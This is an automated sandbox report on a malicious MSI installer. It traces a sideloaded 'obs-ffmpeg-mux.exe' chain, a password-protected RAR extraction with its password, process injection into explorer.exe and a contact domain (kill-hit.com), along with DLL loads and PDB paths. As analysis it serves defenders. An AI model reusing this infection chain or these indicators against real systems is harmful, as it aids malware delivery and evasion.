Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA382C8F87_2_00007FFDA382C8F8
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA3828E987_2_00007FFDA3828E98
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA3830E007_2_00007FFDA3830E00
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA3788D807_2_00007FFDA3788D80
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA38212007_2_00007FFDA3821200
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA38397F87_2_00007FFDA38397F8
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDAC0F8DB07_2_00007FFDAC0F8DB0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDAC0F68B07_2_00007FFDAC0F68B0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDAC103AA77_2_00007FFDAC103AA7
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDAC104B4A7_2_00007FFDAC104B4A
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C0782011_2_00C07820
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C0C03111_2_00C0C031
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C0817411_2_00C08174
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C032F011_2_00C032F0
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C193ED11_2_00C193ED
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C0D3B011_2_00C0D3B0
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C145D811_2_00C145D8
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C0559011_2_00C05590
Source: C:\Windows\SysWOW64\explorer.exe Code function: String function: 00C086B0 appears 33 times
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe Code function: String function: 00007FFDA3781740 appears 139 times
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe Code function: String function: 00007FFD936F56C0 appears 288 times
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exe Code function: String function: 00007FF7AACBE42C appears 41 times
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1836 -s 256
Source: avformat-60.dll.2.dr Static PE information: Number of sections : 12 > 10
Source: avutil-58.dll.2.dr Static PE information: Number of sections : 12 > 10
Source: swscale-7.dll.2.dr Static PE information: Number of sections : 12 > 10
Source: zlib.dll.2.dr Static PE information: Number of sections : 12 > 10
Source: avcodec-60.dll.2.dr Static PE information: Number of sections : 13 > 10
Source: swresample-4.dll.2.dr Static PE information: Number of sections : 12 > 10
Source: api-ms-win-crt-convert-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-2-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.2.dr Static PE information: No import functions for PE file found
Source: K064a7Rfk7.msi Binary or memory string: OriginalFilenameAICustAct.dllF vs K064a7Rfk7.msi
Source: K064a7Rfk7.msi Binary or memory string: OriginalFilenameSoftwareDetector.dllF vs K064a7Rfk7.msi
Source: K064a7Rfk7.msi Binary or memory string: OriginalFilenameucrtbase.dllj% vs K064a7Rfk7.msi
Source: K064a7Rfk7.msi Binary or memory string: OriginalFilenamevcruntime140.dllT vs K064a7Rfk7.msi
Source: K064a7Rfk7.msi Binary or memory string: OriginalFilenamemsvcp140.dllT vs K064a7Rfk7.msi
Source: K064a7Rfk7.msi Binary or memory string: OriginalFilenameMicrosoft.Web.WebView2.Core.dll vs K064a7Rfk7.msi
Source: K064a7Rfk7.msi Binary or memory string: OriginalFilenameMicrosoft.UI.Xaml.dllD vs K064a7Rfk7.msi
Source: K064a7Rfk7.msi Binary or memory string: OriginalFilenameembeddeduiproxy.dllF vs K064a7Rfk7.msi
Source: classification engine Classification label: mal92.evad.winMSI@16/80@1/1
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exe Code function: 5_2_00007FF7AACC0C68 GetLastError,FormatMessageW,LocalFree
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exe Code function: 5_2_00007FF7AACC3C48 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exe Code function: 5_2_00007FF7AACE2740 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,SetSuspendState,ExitWindowsEx
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exe Code function: 5_2_00007FF7AACCB22C GetDiskFreeSpaceExW,_invalid_parameter_noinfo_noreturn
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exe Code function: 5_2_00007FF7AACCDE20 CoCreateInstance,CoSetProxyBlanket,VariantClear
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe Code function: 7_2_00007FFDA378A720 OutputDebugStringA,OutputDebugStringA,PowerClearRequest,GetTapePosition,CloseThreadpool,CloseThreadpoolTimer,GetUserDefaultLangID,LoadResource,GetFileAttributesTransactedW,PtInRegion,GetFinalPathNameByHandleW,AddFontResourceW,GetTextCharset,GetActiveProcessorGroupCount,GetTapePosition,GetWindowOrgEx,SelectObject,SetFileApisToOEM,CreateFontIndirectExW,CreateJobObjectW,IsDBCSLeadByteEx,GetConsoleCP,CreateThreadpoolWork,GetProcessWorkingSetSizeEx,RemoveDllDirectory,SetThreadPreferredUILanguages,DuplicateHandle,GetDefaultCommConfigW,CreateHardLinkW,DefineDosDeviceW,AddVectoredExceptionHandler,ReleaseMutex,GetUserGeoID,IsBadStringPtrW,GetTickCount64,TerminateJobObject,VerifyScripts,GetFileAttributesExW,GlobalMemoryStatusEx
Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\Microsoft\CML2FC.tmp
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4896:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3004:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe Mutant created: \Sessions\1\BaseNamedObjects\ycsepmubxbtwkolmtv
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6468:120:WilError_03
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\TEMP\~DFA969DD5B00E89354.TMP
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe Command line argument: kill-hit.com 11_2_00C01020
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: obs-ffmpeg-mux.exe String found in binary or memory: start/stop audio
Source: obs-ffmpeg-mux.exe String found in binary or memory: #EXT-X-START value isinvalid, it will be ignored
Source: obs-ffmpeg-mux.exe String found in binary or memory: #EXT-X-START:
Source: obs-ffmpeg-mux.exe String found in binary or memory: prefer to use #EXT-X-START if it's in playlist instead of live_start_index
Source: unknown Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\K064a7Rfk7.msi"
Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6E85F61D79C141FA458D0DA7A80AAA4F
Source: C:\Windows\System32\msiexec.exe Process created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exe "C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exe" x -p3809610121t -o+ "C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\iwhgjds.rar" "C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\"
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\msiexec.exe Process created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe "C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe"
Source: C:\Windows\System32\msiexec.exe Process created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\createdump.exe "C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\createdump.exe"
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\createdump.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe explorer.exe
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1836 -s 256
Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowmanagementapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.immersive.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: atlthunk.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeSection loaded: obs.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeSection loaded: avcodec-60.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeSection loaded: avutil-58.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeSection loaded: avformat-60.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeSection loaded: w32-pthreads.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeSection loaded: swresample-4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\createdump.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\createdump.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\createdump.exeSection loaded: dbgcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\createdump.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\msiexec.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7C382357-94C2-4F1A-B1DD-2EBBA0F0B9A9}Jump to behavior
Source: K064a7Rfk7.msiStatic file information: File size 59426257 > 1048576
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\debug\createdump\createdump.pdb source: createdump.exe, 00000008.00000002.2309946294.00007FF7C76D8000.00000002.00000001.01000000.00000006.sdmp, createdump.exe, 00000008.00000000.2304497963.00007FF7C76D8000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: C:\ReleaseAI\win\Release\bin\x86\embeddeduiproxy.pdb= source: K064a7Rfk7.msi
Source: Binary string: C:\ReleaseAI\win\Release\WinUiBootstrapperEui\WinUiBootstrapperEui.pdb)) source: K064a7Rfk7.msi
Source: Binary string: ucrtbase.pdb source: K064a7Rfk7.msi
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.2.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: api-ms-win-core-memory-l1-1-0.dll.2.dr
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: api-ms-win-core-debug-l1-1-0.dll.2.dr
Source: Binary string: Microsoft.Web.WebView2.Core.pdbGCTL source: K064a7Rfk7.msi
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdbm source: K064a7Rfk7.msi
Source: Binary string: E:\BA\201\s\140_release\vcrt_fwd_x86_release\Release\vcamp140_app.pdb source: K064a7Rfk7.msi
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: K064a7Rfk7.msi
Source: Binary string: E:\BA\201\s\140_release\vcrt_fwd_x86_release\Release\vccorlib140_app.pdb source: K064a7Rfk7.msi
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdbGCTL source: K064a7Rfk7.msi
Source: Binary string: C:\ReleaseAI\win\Release\WinUiBootstrapperEui\WinUiBootstrapperEui.pdb source: K064a7Rfk7.msi
Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: K064a7Rfk7.msi
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.2.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.2.dr
Source: Binary string: D:\a\_work\1\s\140_release\vcrt_fwd_x86_release\Release\msvcp140_app.pdb source: K064a7Rfk7.msi
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.2.dr
Source: Binary string: D:\releases\dva\shared\adobe\utest\lib\win\release\64\utest.pdb source: utest.dll.2.dr
Source: Binary string: E:\BA\201\s\140_release\vcrt_fwd_x86_release\Release\vcomp140_app.pdb source: K064a7Rfk7.msi
Source: Binary string: D:\a\1\s\Win32\Release\Microsoft.Toolkit.Win32.UI.XamlApplication\Microsoft.Toolkit.Win32.UI.XamlHost.pdb!! source: K064a7Rfk7.msi
Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: obs-ffmpeg-mux.exe, 00000007.00000002.2338386873.00007FFDAC131000.00000002.00000001.01000000.0000000C.sdmp, vcruntime140.dll.2.dr
Source: Binary string: D:\releases\dva\shared\adobe\utest\lib\win\release\64\utest.pdb((! source: utest.dll.2.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.2.dr
Source: Binary string: C:\a\_work\1\s\BuildOutput\Release\x86\Microsoft.UI.Xaml\Microsoft.UI.Xaml.pdb source: K064a7Rfk7.msi
Source: Binary string: D:\a\_work\1\s\140_release\vcrt_fwd_x86_release\Release\vcruntime140_app.pdb source: K064a7Rfk7.msi
Source: Binary string: obs-ffmpeg-mux.pdb source: obs-ffmpeg-mux.exe, 00000007.00000002.2315346958.00007FF71E745000.00000002.00000001.01000000.00000005.sdmp, obs-ffmpeg-mux.exe, 00000007.00000000.2304470611.00007FF71E745000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: D:\a\1\s\Win32\Release\Microsoft.Toolkit.Win32.UI.XamlApplication\Microsoft.Toolkit.Win32.UI.XamlHost.pdb source: K064a7Rfk7.msi
Source: Binary string: C:\ReleaseAI\win\Release\bin\x86\embeddeduiproxy.pdb source: K064a7Rfk7.msi
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\debug\createdump\createdump.pdb;;;GCTL source: createdump.exe, 00000008.00000002.2309946294.00007FF7C76D8000.00000002.00000001.01000000.00000006.sdmp, createdump.exe, 00000008.00000000.2304497963.00007FF7C76D8000.00000002.00000001.01000000.00000006.sdmp
